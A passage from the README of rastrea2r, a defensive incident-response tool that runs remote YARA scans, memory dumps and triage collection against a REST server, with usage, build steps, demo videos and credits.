path          File or directory path to scan
server        rastrea2r REST server
rule          Yara rule on REST server

optional arguments:
-h, --help    show this help message and exit
-s, --silent  Suppresses standard output

• For ex, on a Mac or Unix system you would do:

$cd src/rastrea2r/osx/

$python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar

• Apart from the libraries specified in requirements.txt, we need to install the following libraries
  

  • PSutil for win64: https://github.com/giampaolo/psutil
  • WMI for win32: https://pypi.python.org/pypi/WMI/
  • Requests: pip install requests

• Compiling rastrea2r

  Make sure you have all the dependencies installed for the binary you are going to build on your Windows box. Then install:
  

  • Pywin32: http://sourceforge.net/projects/pywin32/files/ ** Windows only
  • Pyinstaller: https://github.com/pyinstaller/pyinstaller/wiki

• yara-disk: Yara scan for file/directory objects on disk
• yara-mem: Yara scan for running processes in memory
• memdump: Acquires a memory dump from the endpoint ** Windows only
• triage: Collects triage information from the endpoint ** Windows only

• Binaries (sysinternals, batch files and others) must be located in a shared folder called TOOLS (read only)
  

  \path-to-share-foldertools

• Output is sent to a shared folder called DATA (write only)
  

  \path-to-share-folderdata

• For yara-mem and yara-disk scans, the yara rules must be in the same directory where the server is executed from.
  
• The RESTful API server stores data received in a file called results.txt in the same directory.
  

• Video 1: Incident Response / Triage with rastrea2r on the command line - https://youtu.be/uFIZxqWeSyQ
• Video 2: Remote Yara scans with rastrea2r on the command line - https://youtu.be/cnY1yEslirw
• Video 3: Using rastrea2r with McAfee ePO - Client Tasks & Execution - https://youtu.be/jB17uLtu45Y

• rastrea2r at BlackHat Arsenal 2016 (check PDF for documentation on usage and examples) https://www.blackhat.com/us-16/arsenal.html#rastrea2r

  https://github.com/aboutsecurity/Talks-and-Presentations/blob/master/Ismael_Valenzuela-Hunting_for_IOCs_rastrea2r-BH_Arsenal_2016.pdf

• Recording of talk on rastrea2r at the SANS Threat Hunting Summit 2016

  https://www.youtube.com/watch?v=0PvBsL6KKfA&feature=youtu.be&a

• To Robert Gresham Jr. (@rwgresham) and Ryan O'Connor (@_remixed) for their contributions to the Triage module. Thanks folks!
• To Ricardo Dias for the idea of using a REST server and his great paper on how to use Python and Yara with McAfee ePO: http://www.sans.org/reading-room/whitepapers/forensics/intelligence-driven-incident-response-yara-35542